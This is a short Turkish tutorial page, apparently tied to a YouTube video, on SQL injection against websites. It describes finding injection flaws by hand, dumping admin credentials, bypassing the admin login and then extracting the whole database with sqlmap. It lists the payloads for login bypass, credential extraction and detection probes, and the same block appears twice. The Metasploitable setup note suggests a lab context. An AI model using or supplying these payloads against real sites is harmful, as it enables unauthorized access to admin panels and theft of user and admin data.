Sql injection 5 lwl ) Web sitesinde öncelikle sql zaafı deniyoruz manuel olarak ve bulduğumuz zaaflardan kullanıcı admin bilgilerini tek komut uygulayarak Tüm admin bilgilerini web sitesi üzerinde çıkartabiliyoruz ardından admin login kısmını bypass edip admin peneline girebiliyoruz ardından ise auto kullanarakta sqlmaptanda tüm databilgilere erişebiliriz yani hem manuel hemde auto yöntemini kullanıyoruz.
Yaş kısıtlaması var tehdit olarak algılandı için youtubeden girmeniz gerekir
Youtube Link
Metasploitable Kurulumu : Web Sitesi h*cki*g / Sızma Testi İçin Kurmanız Gerekenler
Komutlar
admin' # (admin panel giriş bypass)
aa' or 1=1# (Admin bilgilerini çıkart)
Sql zaafını Tespit et
1'
'admin'__'
'+OR+1=1--
'OR1=1--'
'--
'--'
Yaş kısıtlaması var tehdit olarak algılandı için youtubeden girmeniz gerekir
Youtube Link
Metasploitable Kurulumu : Web Sitesi h*cki*g / Sızma Testi İçin Kurmanız Gerekenler
Komutlar
admin' # (admin panel giriş bypass)
aa' or 1=1# (Admin bilgilerini çıkart)
Sql zaafını Tespit et
1'
'admin'__'
'+OR+1=1--
'OR1=1--'
'--
'--'